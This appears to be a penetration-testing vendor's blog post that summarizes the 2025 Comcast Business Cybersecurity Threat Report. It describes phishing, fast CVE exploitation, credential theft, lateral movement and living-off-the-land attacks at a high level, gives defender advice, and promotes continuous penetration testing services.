The 2025 Comcast Business Cybersecurity Threat Report analyzed 34.6 billion cybersecurity events across industries, revealing how attackers are shifting tactics and accelerating the pace at which exposures become exploitable. The headline numbers matter, but the pragmatic lesson for security teams is this: adversaries turn small, common conditions into high impact compromises. To make this practical, we will expand on four of the threats that keep showing up in breach postmortems, how they work in reality, and what organizations should do about them.

Phishing: The initial foothold that scales into enterprise compromise

How attackers use phishing in the wild

Phishing is rarely a single email and a click. Modern campaigns use reconnaissance to craft believable lures, weaponize context like invoices or HR notices, and chain follow on techniques. Attackers will often begin with low-cost reconnaissance. They map public profiles, look for recent hires, understand typical vendor relationships, and harvest details that make an email believable.

From a single successful click the attacker can: obtain credentials, capture session cookies, weaponize MFA fatigue techniques, trick users into approving OAuth consent, or drop a malware payload that provides remote access. Once inside, attackers probe for high value targets, gather credentials, and move laterally.

Real-world risks

A phish click alone can look benign. The real risk is the chain it enables. Compromised credentials can be replayed across corporate applications. OAuth consent abuse can grant persistent API access. Malware can stage ransomware or data theft. Organizations that treat phishing metrics as the end goal miss the true business impact.

How defenders should think about it

Focus on the post-click story. Ask: what could an attacker do immediately after a successful click in my environment? Which accounts could they access? What privileged operations are exposed? How quickly could they escalate and move laterally?

Rapid CVE exploitation: Vulnerabilities become tools at a faster pace

How exploited vulnerabilities manifest

When a critical vulnerability goes public, attackers and researchers both rush to understand exploitability. Soon after, automated exploit scanners and public proof of concept code often appear on the Iinternet. Attackers use simple reconnaissance to identify exposed versions, then run mass scanning to find vulnerable targets. Most frequently, these attacks are opportunistic, not targeted.

Some adversaries focus on stealthy reconnaissance first. Others weaponize quickly, chaining a vulnerable service into a lateral pivot or data exfiltration path. The pace of weaponization has shortened dramatically, which compresses defender response windows.

Real-world risks

A patched vulnerability is only as good as your ability to find and validate whether you were exposed prior to patching. If an attacker discovers an unpatched service in your estate, they can gain initial access, plant persistence, or act as a launch point for ransomware. The window between public disclosure and active exploitation is when many breaches occur.

How defenders should think about it

Treat new vulnerability disclosures as triggers, not as calendar items. Validate exposure quickly. Prioritize assets not only by CVSS score, but by business criticality and exploitability in your environment. Understand which assets, if compromised, would enable escalation.

Credential theft and lateral movement: The pathways from compromise to enterprise impact

How credential theft is weaponized

Credential theft can happen in many ways. Attackers buy credentials on underground markets. They harvest passwords via phishing or malware. They exploit weak password reuse or misconfigured services to pivot. Once they have an account, attackers escalate by identifying privileged accounts, leveraging credential stuffing, or exploiting single-sign-on and trust relationships.

Lateral movement frequently follows a consistent pattern. The attacker enumerates neighboring systems, looks for stored credentials or misconfigurations, and leverages administrative interfaces and remote management tools to broaden access. Inadequate segmentation and implicit trust often make this straightforward.

Real-world risks

Credential theft is a force multiplier. With valid credentials, attackers bypass many preventive controls. They can access sensitive data, disable logging, and execute high impact actions that lead to theft, extortion, or system disruption. Incident response becomes more complex because the activity often looks like legitimate user behavior.

How defenders should think about it

Assume credentials will be compromised and design security architectures for containment. Harden authentication, limit privilege, and ensure robust monitoring and detection on privileged operations. Most importantly, validate whether privilege escalation and lateral movement are possible in practice, not just in policy documents.

Playing Out the Endgame: LotL, data exfiltration, and ransomware

How attackers execute endgame objectives

Initial access and lateral movement are only the first phases. Once embedded, adversaries pursue endgame actions: exfiltrating sensitive data, staging ransomware or extortion, and in some cases deploying destructive payloads that disrupt operations. Increasingly, attackers use living off the land (LotL) techniques, abusing legitimate tools like PowerShell, WMI, or native admin interfaces — to avoid detection and reduce their need for custom malware.

Real-world risks

LotL makes endgame attacks stealthier and harder to catch. Security tools tuned for “malware” may miss native commands being abused for reconnaissance, credential dumping, or data staging. By the time ransomware is launched or data is exfiltrated, the adversary may have been operating quietly for weeks using nothing more than what already exists in the environment. The business impact is severe: stolen data, regulatory fines, brand damage, or outright downtime from ransomware or destructive payloads.

How defenders should think about it

Organizations should not only test for whether ransomware can execute, but also how well their teams can detect and respond to legitimate tools being used for illegitimate purposes. Threat modeling should include scenarios where LotL techniques form the bridge between initial access and business impact. Response plans should assume attackers will avoid “noisy” malware in favor of stealthy, built-in capabilities.

Practical steps for security teams right now

  1. Treat disclosures and new threat reports as operational triggers. Automate discovery and schedule validation immediately.
  2. Move beyond click rates. Validate the downstream business impact of a successful social engineering attack.
  3. Prioritize exploitable exposures by combining technical severity with business context.
  4. Assume credentials will fail. Enforce least privilege and test escalation paths.
  5. Use integrated tooling. Feed scanner outputs and ASM data into a validation pipeline that includes human-led testing.
  6. Prepare for the endgame. Threat model likely adversary paths to data theft, ransomware, or disruption and validate that protection, detection, and response controls hold up under pressure.

How Continuous Penetration Testing Helps

“The sheer volume of CVEs, the complexity of enterprise IT environments, and downtime considerations can all slow mitigation. This is why a risk-based approach to vulnerability management, coupled with continuous testing, is crucial.” – 2025 Comcast Business Cybersecurity Threat Report

Continuous Phishing

Sprocket tests phishing as an operational problem. We simulate realistic campaigns, capture which accounts are impacted, then validate the downstream exposure by attempting escalation and lateral movement from the foothold. The result is a prioritized set of validated findings that show not just that users clicked, but how the business can be harmed after the click.

Bleeding-Edge Vulnerability Testing

Sprocket’s exposure-driven approach triggers targeted validation when new CVEs are disclosed. We combine automated discovery with manual verification to eliminate false positives and confirm true risk. That allows teams to focus remediation on exploitable exposures, reducing time-to-fix and shrinking the window of opportunity for attackers.

Assumed Breach Testing

Sprocket actively validates escalation paths and lateral movement techniques in your environment. Our testers attempt credential reuse and privilege escalation in controlled conditions, producing validated findings with clear remediation guidance. This validation proves whether controls are effective under real attack conditions and reduces the time attackers must operate undetected.

Threat Modeling & Red Team Events

Sprocket’s Red Team Events and threat modeling exercises emulate advanced adversaries who rely heavily on living off the land techniques to move toward exfiltration, ransomware, and destructive outcomes. By validating how native tools can be misused in each environment, we help organizations understand where their defenses are blind and whether protection, detection, and response controls can withstand realistic endgame scenarios.

Closing: From exposure awareness to verified assurance

The Comcast report provides a useful snapshot of volume and trend. The bigger takeaway is an operational one. When threats change quickly, security programs must change faster. Continuous penetration testing is a practice that gives organizations the evidence they need to act, to prioritize, and to demonstrate measurable reduction in exposure.

For organizations, the next step is translating these industry-wide trends into their own context. Start by reviewing your current testing cadence, understanding how quickly exposures are validated, and identifying where blind spots may exist. Continuous validation is not just a best practice; it is becoming a necessity to keep pace with the speed of modern threats.

Read the Comcast report here: https://business.comcast.com/enterprise/resources/reports/2025-comcast-business-cybersecurity-threat-report